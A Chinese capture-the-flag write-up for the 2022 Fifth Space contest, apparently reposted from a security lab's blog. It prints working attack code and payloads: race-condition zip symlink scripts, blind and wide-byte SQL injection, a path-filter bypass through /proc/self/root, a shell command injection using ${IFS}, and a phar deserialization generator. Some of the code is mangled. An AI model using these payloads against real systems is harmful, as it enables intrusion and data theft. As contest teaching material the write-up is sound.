-
5_简单的Base
attack1:
from pwn import *
ip = "39.106.134.45"
port = 15342
r2 = remote(ip,port)
payload_exp="UEsDBAoAAAAAANszM1VOewN1BQAAAAUAAAADABwAMTIzVVQJAAOeDChjoAwoY3V4CwABBOcDAAAE5wMAAC9mbGFnUEsBAh4DCgAAAAAA2zMzVU57A3UFAAAABQAAAAMAGAAAAAAAAAAAAP+hAAAAADEyM1VUBQADngwoY3V4CwABBOcDAAAE5wMAAFBLBQYAAAAAAQABAEkAAABCAAAAAAA="
while 1:
# r2.recvuntil("Input your choicen>>")
r2.sendline("4")
r2.recvuntil("Base64-encoded zip of sakanas:")
r2.sendline(payload_exp)
attack2
from pwn import *
context(os="linux", arch="amd64", log_level="CRITICAL")
import os
ip = "39.106.134.45"
port = 15342
payload_pass = "UEsDBAoAAAAAANszM1VOewN1BQAAAAUAAAADABwAMTIzVVQJAAOeDChjoAwoY3V4CwABBOcDAAAE5wMAAC9mbGFnUEsBAh4DCgAAAAAA2zMzVU57A3UFAAAABQAAAAMAGAAAAAAAAAAAAAAAAAAAADEyM1VUBQADngwoY3V4CwABBOcDAAAE5wMAAFBLBQYAAAAAAQABAEkAAABCAAAAAAA="
while 0:
try:
r1 = remote(ip,port)
r1.recvuntil("Input your choicen>>")
r1.sendline("4")
r1.recvuntil("Base64-encoded zip of sakanas:")
r1.sendline(payload_pass)
r1.sendline("2")
r1.recvuntil("sakana to download")
r1.sendline("0")
out = r1.recv()
if "Here is your sakana file" in out:
print(out)
break
except Exception as e:
r1.close()
两个脚本同时开始运行,跑条件竞争,就可以拿到flag了。
-
5_web_Eeeeasy_SQL
#导入requests包
import requests
import urllib
#靶机的URL
url = "http://39.106.158.135:22333/api/api.php?command=login"
def ord2hex(string):
result = ''
for i in string:
result += hex(ord(i))
result = result.replace('0x','')
return '0x'+result
chars = '0123456789.,abcdefghijklmnopqrstuvwxyz-ABCDEFGHIJKLMNOPQRSTUVWXYZ{}_!@#$%^&*()'
res = ""
#循环
flag = 0
46
for i in range(1,300):
for c in chars:
payload = urllib.parse.unquote("or%09case%09when%09ELT(LOCATE({},version()),{})%09then%09cot(0)%09else%091%09end#".format(ord2hex(res+c),i))
payload = urllib.parse.unquote("or%09case%09when%09ELT(LOCATE({},hex(username)),{})%09then%09cot(0)%09else%091%09end#".format(ord2hex(res+c),i))
d = {"username":"admin\","password":payload}
# print(d)
rep = requests.post(url,data=d,allow_redirects=False)
#获取请求文本
result = rep.text
# print(result)
if(len(result)<10):
# print(result)
res += c
print("[*]当前库名为:"+res)
break
分别注username和password,登陆。
<?php
session_start();
if(isset($_SESSION['name'])){
if($_SESSION['name'] === 'Flag_Account'){
$file = urldecode($_GET['file']);
if(!preg_match('/^/flag|var|tmp|php|log|%|sess|etc|usr|.|:|base|ssh|http/i',$file)){
readfile($file);
}else{
echo 'try again~';
}
}
show_source(__FILE__);
}else{
echo '登陆一下吧~';
}
不能直接用/flag,简单用/proc/self/root/flag绕过。
-
5_web_letmeguess_1
admin admin123弱口令登录。
$(tar${IFS}cvf${IFS}index${IFS}.),命令执行,然后下载index解压得到flag。
-
5_web_BaliYun
www.zip源码,phar反序列化:
<?php
class upload{
public $filename;
public $ext;
public $size;
public $Valid_ext;
}
@unlink("test.phar");
$phar = new Phar("test.phar");//后缀名必须为phar
$phar->startBuffering();
$phar->setStub("<?php __HALT_COMPILER(); ?>");//设置stub
$o = new upload();
$o->filename = "/flag";
$phar->setMetadata($o);//将自定义的meta-data存入manifest
$phar->addFromString("test.txt", "test");//添加要压缩的文件
$phar->stopBuffering();
-
5_easylogin
sql注入,burp抓包时发现gbk乱码,意识到是宽字节注入。
username=admin%df'&password=admin
报错:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''admin�''' at line 1
测试联合注入发现:
总是出现语法错误,排查后发现select和union等会被替换为空,比较简单利用双写绕过即可。
直接联合注入密码无法登陆,联想到常规站点开发密码会被md5,于是用md5去加密,由于无法用引号,选择16进制绕过。
原文始发于微信公众号(山石网科安全技术研究院):2022年第五空间网络安全大赛WriteUp | Web & Misc
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论